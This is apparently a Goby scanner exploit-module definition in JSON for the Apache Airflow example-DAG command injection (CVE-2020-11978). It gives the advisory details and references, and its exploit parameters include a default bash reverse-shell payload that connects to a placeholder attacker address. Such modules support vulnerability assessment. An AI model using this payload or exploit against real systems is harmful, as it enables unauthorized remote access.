{ "Name": "Apache Airflow Example Dag RCE (CVE-2020-11978)", "Description": "An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.", "Product": "APACHE-Airflow", "Homepage": "https://airflow.apache.org/", "DisclosureDate": "2021-06-03", "Author": "李大壮", "GobyQuery": "product=\"APACHE-Airflow\"", "Level": "3", "Impact": "

An attacker can obtain system privileges with a specific request

", "Recommandation": "

1. Update version

2. Update the patch

", "References": [ "https://gobies.org/" ], "RealReferences": [ "http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html", "https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E", "https://nvd.nist.gov/vuln/detail/CVE-2020-11978", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11978" ], "HasExp": true, "ExpParams": [ { "Name": "AttackType", "Type": "select", "Value": "goby_shell,self_shell" }, { "Name": "self_shell", "Type": "input", "value": "bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxx <&1", "show": "AttackType=self_shell" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": null, "ExploitSteps": null, "Tags": [ "rce" ], "CVEIDs": [ "CVE-2020-11978" ], "CVSSScore": "8.8", "AttackSurfaces": { "Application": [ "APACHE-Airflow" ], "Support": null, "Service": [ "APACHE-Airflow" ], "System": null, "Hardware": null }, "Disable": false }